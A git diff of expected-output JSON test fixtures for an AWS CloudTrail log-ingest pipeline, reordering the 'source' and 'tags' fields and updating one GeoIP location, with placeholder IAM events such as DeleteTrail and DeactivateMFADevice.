@@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2019-11-27T15:07:22Z\"}}},\"eventTime\":\"2019-11-27T15:10:15Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"CreateVirtualMFADevice\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"console.amazonaws.com\",\"requestParameters\":{\"virtualMFADeviceName\":\"Alice\",\"path\":\"/\"},\"responseElements\":{\"virtualMFADevice\":{\"serialNumber\":\"arn:aws:iam::0123456789012:mfa/Alice\"}},\"requestID\":\"EXAMPLE-303b-4b0e-a8c7-EXAMPLE\",\"eventID\":\"EXAMPLE-351c-472a-b089-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -78,7 +75,10 @@ "name": "Other" }, "original": "console.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-deactivate-mfa-device-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-deactivate-mfa-device-json.log-expected.json index 764cc3d905b..b30f8843ba1 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-deactivate-mfa-device-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-deactivate-mfa-device-json.log-expected.json 
@@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-09T16:36:17Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T00:34:02Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"DeactivateMFADevice\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"userName\":\"Alice\",\"serialNumber\":\"arn:aws:iam::0123456789012:mfa/Alice\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-801a-4624-8fa0-EXAMPLE\",\"eventID\":\"EXAMPLE-1889-416b-ace9-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -76,7 +73,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-access-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-access-key-json.log-expected.json index 885f9b97c97..aa9e820ad8b 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-access-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-access-key-json.log-expected.json 
@@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T19:09:36Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"DeleteAccessKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"userName\":\"Bob\",\"accessKeyId\":\"EXAMPLE_ID\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-3bea-41fa-a0b4-EXAMPLE\",\"eventID\":\"EXAMPLE-0698-46bd-998d-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -77,7 +74,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json index 4ed161acea7..ce237efc69a 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json 
@@ -14,14 +14,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-ssh-public-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-ssh-public-key-json.log-expected.json index 6ffa98520d4..253d4c6b7bb 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-ssh-public-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-ssh-public-key-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { 
@@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T16:07:08Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"DeleteSSHPublicKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"sSHPublicKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Bob\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-7b34-44ae-a22f-EXAMPLE\",\"eventID\":\"EXAMPLE-72ff-4d4f-9a8d-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -77,7 +74,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json index 2dd33e98815..ae6e0fb9e5f 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-west-2", "account": { 
@@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\"},\"eventTime\":\"2020-01-09T20:09:51Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"DeleteTrail\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/test-trail\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-d44f-4a2a-966f-EXAMPLE\",\"eventID\":\"EXAMPLE-3f9d-4634-8ff1-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "cloudtrail.amazonaws.com", @@ -63,7 +60,10 @@ "name": "Spider" }, "version": "1.16.310" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-user-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-user-json.log-expected.json index 6bb1d94f1ec..6026a18f907 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-user-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-user-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { 
@@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-03T15:26:38Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-03T15:50:52Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"DeleteUser\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"userName\":\"Bob\"},\"responseElements\":null,\"requestID\":\"0e794d53-cdb5-4f7d-b7db-5EXAMPLE\",\"eventID\":\"b89eb34b-8fcb-4cba-8439-d4EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", "provider": "iam.amazonaws.com", @@ -76,7 +73,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-virtual-mfa-device-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-virtual-mfa-device-json.log-expected.json index a482b812221..86319a3d4bf 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-virtual-mfa-device-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-virtual-mfa-device-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { 
@@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-09T16:36:17Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T00:34:02Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"DeleteVirtualMFADevice\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"serialNumber\":\"arn:aws:iam::0123456789012:mfa/Alice\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-af91-4d1a-aaf2-EXAMPLE\",\"eventID\":\"EXAMPLE-f8e6-4d5f-8525-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -72,7 +69,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-enable-mfa-device-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-enable-mfa-device-json.log-expected.json index 5a66ad5660b..9ac93b9661a 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-enable-mfa-device-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-enable-mfa-device-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { 
@@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2019-11-27T15:07:22Z\"}}},\"eventTime\":\"2019-11-27T15:11:09Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"EnableMFADevice\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"console.amazonaws.com\",\"requestParameters\":{\"userName\":\"Bob\",\"serialNumber\":\"arn:aws:iam::0123456789012:mfa/Bob\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-adea-490a-a806-EXAMPLE\",\"eventID\":\"EXAMPLE-3fdc-4b2a-9885-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -76,7 +73,10 @@ "name": "Other" }, "original": "console.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json index 3101de44c80..39c81506b77 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-west-2", "account": { 
@@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T15:30:25Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"StartLogging\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"TEST-trail\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-1c30-4f43-9763-EXAMPLE\",\"eventID\":\"EXAMPLE-aa78-4a84-a27f-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "cloudtrail.amazonaws.com", @@ -67,7 +64,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json index 79d7439e301..47da079038e 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-west-2", "account": { 
@@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-09T16:36:17Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-09T16:46:16Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"StopLogging\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-869f-4fec-86f9-EXAMPLE\",\"eventID\":\"EXAMPLE-8cc3-42db-9a0d-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "cloudtrail.amazonaws.com", @@ -67,7 +64,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-access-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-access-key-json.log-expected.json index 0d57cca9cf0..5ae9bff9831 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-access-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-access-key-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { 
@@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T15:01:23Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UpdateAccessKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"status\":\"Inactive\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Bob\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-7d0c-45f4-b25b-EXAMPLE\",\"eventID\":\"EXAMPLE-0ef0-42cd-8551-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -78,7 +75,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-accout-password-policy-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-accout-password-policy-json.log-expected.json index cdc24c9d2f8..27ceafa8f30 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-accout-password-policy-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-accout-password-policy-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { 
@@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T18:05:33Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UpdateAccountPasswordPolicy\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"requireLowercaseCharacters\":true,\"requireSymbols\":true,\"requireNumbers\":true,\"minimumPasswordLength\":12,\"requireUppercaseCharacters\":true,\"allowUsersToChangePassword\":true},\"responseElements\":null,\"requestID\":\"EXAMPLE-5ebf-4bc3-a349-EXAMPLE\",\"eventID\":\"EXAMPLE-91f9-49f3-948c-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -77,7 +74,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-login-profile-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-login-profile-json.log-expected.json index 54e213526e6..a4d54bfee51 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-login-profile-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-login-profile-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { 
@@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T18:25:42Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UpdateLoginProfile\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"userName\":\"Bob\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-0dc6-447a-8859-EXAMPLE\",\"eventID\":\"EXAMPLE-c3b6-4498-b818-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -76,7 +73,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-ssh-public-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-ssh-public-key-json.log-expected.json index c6ee9087cd3..913be656a4d 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-ssh-public-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-ssh-public-key-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { 
@@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T16:06:54Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UpdateSSHPublicKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"status\":\"Inactive\",\"userName\":\"Bob\",\"sSHPublicKeyId\":\"EXAMPLE_KEY_ID\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-32f3-4a92-82e1-EXAMPLE\",\"eventID\":\"EXAMPLE-5c88-4652-9ee9-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -78,16 +75,12 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } - }, - { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "cloud": { "region": "us-east-1", "account": { 
